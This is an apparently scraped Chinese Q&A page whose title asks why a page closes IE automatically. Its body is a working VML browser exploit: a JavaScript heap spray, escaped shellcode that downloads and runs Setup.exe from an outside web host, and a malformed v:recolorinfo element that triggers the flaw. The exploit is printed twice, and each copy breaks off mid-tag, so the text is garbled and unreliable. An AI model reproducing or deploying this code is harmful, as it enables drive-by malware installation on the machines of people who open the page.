运行时会自动关闭IE解决思路
日期:2014-05-16 浏览次数:20438 次
运行时会自动关闭IE
<!-- vml 'exploit! -->
<html xmlns:v= "urn:schemas-microsoft-com:vml ">
<head>
<object id= "VMLRender " classid= "CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E ">
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>
<body>
<script language= "javascript ">
var shellcode = unescape( "%u9090 "+ "%u9090 "+
"%u6460%u30a1%u0000%u8b00%u0c40%u708b%uad1c%u708b " +
"%u8108%u00ec%u0004%u8b00%u56ec%u8e68%u0e4e%ue8ec " +
"%u00ff%u0000%u4589%u5604%u9868%u8afe%ue80e%u00f1 " +
"%u0000%u4589%u5608%u2568%uffb0%ue8c2%u00e3%u0000 " +
"%u4589%u560c%uef68%ue0ce%ue860%u00d5%u0000%u4589 " +
"%u5610%uc168%ue579%ue8b8%u00c7%u0000%u4589%u4014 " +
"%u3880%u75c3%u89fa%u1845%u08e9%u0001%u5e00%u7589 " +
"%u8b24%u0445%u016a%u8b59%u1855%ue856%u008c%u0000 " +
"%u6850%u1a36%u702f%u98e8%u0000%u8900%u1c45%uc58b " +
"%uc083%u8950%u2045%uff68%u0000%u5000%u458b%u6a14 " +
"%u5902%u558b%ue818%u0062%u0000%u4503%uc720%u5c00 " +
"%u2e7e%uc765%u0440%u6578%u0000%u75ff%u8b20%u0c45 " +
"%u016a%u8b59%u1855%u41e8%u0000%u6a00%u5807%u4503 " +
"%u3324%u53db%uff53%u2075%u5350%u458b%u6a1c%u5905 " +
"%u558b%ue818%u0024%u0000%u006a%u75ff%u8b20%u0845 " +
"%u026a%u8b59%u1855%u11e8%u0000%u8100%u00c4%u0004 " +
"%u6100%uc481%u04dc%u0000%uc25d%u0024%u5b41%u0352 " +
"%u03e1%u03e1%u03e1%u83e1%u04ec%u535a%uda8b%uf7e2 " +
"%uff52%u55e0%uec8b%u7d8b%u8b08%u0c5d%u8b56%u3c73 " +
"%u748b%u781e%uf303%u8b56%u2076%uf303%uc933%u4149 " +
"%u03ad%u56c3%uf633%ube0f%u3a10%u74f2%uc108%u0dce " +
"%uf203%ueb40%u3bf1%u5efe%ue575%u8b5a%u8beb%u245a " +
"%udd03%u8b66%u4b0c%u5a8b%u031c%u8bdd%u8b04%uc503 " +
"%u5d5e%u08c2%ue800%ufef3%uffff%u5255%u4d4c%u4e4f " +
"%u6800%u7474%u3a70%u2f2f%u7777%u2e77%u6272%u3631 " +
"%u3838%u632e%u6d6f%u732f%u2f63%u6f43%u6e75%u2f74 " +
"%u6553%u7574%u2e70%u7865%u0065 ");
bigblock = unescape( "%u0505%u0505 ");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length <slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace <0x40000) block = block+fillblock;
memory = new Array();
for (i=0;i <350;i++) memory = block + shellcode;
</script>
<v:rect style= 'width:120pt;height:80pt ' fillcolor= "red " >
<v:recolorinfo recolorstate= "t " numcolors= "97612895 ">
<v:recolorinfoentry tocolor= "rgb(1,1,1) " recolortype= "1285 "
lbcolor= "rgb(1,1,1) " forecolor= "rgb(1,1,1) " backcolor= "rgb(1,1,1) &
<!-- vml 'exploit! -->
<html xmlns:v= "urn:schemas-microsoft-com:vml ">
<head>
<object id= "VMLRender " classid= "CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E ">
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>
<body>
<script language= "javascript ">
var shellcode = unescape( "%u9090 "+ "%u9090 "+
"%u6460%u30a1%u0000%u8b00%u0c40%u708b%uad1c%u708b " +
"%u8108%u00ec%u0004%u8b00%u56ec%u8e68%u0e4e%ue8ec " +
"%u00ff%u0000%u4589%u5604%u9868%u8afe%ue80e%u00f1 " +
"%u0000%u4589%u5608%u2568%uffb0%ue8c2%u00e3%u0000 " +
"%u4589%u560c%uef68%ue0ce%ue860%u00d5%u0000%u4589 " +
"%u5610%uc168%ue579%ue8b8%u00c7%u0000%u4589%u4014 " +
"%u3880%u75c3%u89fa%u1845%u08e9%u0001%u5e00%u7589 " +
"%u8b24%u0445%u016a%u8b59%u1855%ue856%u008c%u0000 " +
"%u6850%u1a36%u702f%u98e8%u0000%u8900%u1c45%uc58b " +
"%uc083%u8950%u2045%uff68%u0000%u5000%u458b%u6a14 " +
"%u5902%u558b%ue818%u0062%u0000%u4503%uc720%u5c00 " +
"%u2e7e%uc765%u0440%u6578%u0000%u75ff%u8b20%u0c45 " +
"%u016a%u8b59%u1855%u41e8%u0000%u6a00%u5807%u4503 " +
"%u3324%u53db%uff53%u2075%u5350%u458b%u6a1c%u5905 " +
"%u558b%ue818%u0024%u0000%u006a%u75ff%u8b20%u0845 " +
"%u026a%u8b59%u1855%u11e8%u0000%u8100%u00c4%u0004 " +
"%u6100%uc481%u04dc%u0000%uc25d%u0024%u5b41%u0352 " +
"%u03e1%u03e1%u03e1%u83e1%u04ec%u535a%uda8b%uf7e2 " +
"%uff52%u55e0%uec8b%u7d8b%u8b08%u0c5d%u8b56%u3c73 " +
"%u748b%u781e%uf303%u8b56%u2076%uf303%uc933%u4149 " +
"%u03ad%u56c3%uf633%ube0f%u3a10%u74f2%uc108%u0dce " +
"%uf203%ueb40%u3bf1%u5efe%ue575%u8b5a%u8beb%u245a " +
"%udd03%u8b66%u4b0c%u5a8b%u031c%u8bdd%u8b04%uc503 " +
"%u5d5e%u08c2%ue800%ufef3%uffff%u5255%u4d4c%u4e4f " +
"%u6800%u7474%u3a70%u2f2f%u7777%u2e77%u6272%u3631 " +
"%u3838%u632e%u6d6f%u732f%u2f63%u6f43%u6e75%u2f74 " +
"%u6553%u7574%u2e70%u7865%u0065 ");
bigblock = unescape( "%u0505%u0505 ");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length <slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace <0x40000) block = block+fillblock;
memory = new Array();
for (i=0;i <350;i++) memory = block + shellcode;
</script>
<v:rect style= 'width:120pt;height:80pt ' fillcolor= "red " >
<v:recolorinfo recolorstate= "t " numcolors= "97612895 ">
<v:recolorinfoentry tocolor= "rgb(1,1,1) " recolortype= "1285 "
lbcolor= "rgb(1,1,1) " forecolor= "rgb(1,1,1) " backcolor= "rgb(1,1,1) &
免责声明: 本文仅代表作者个人观点,与爱易网无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
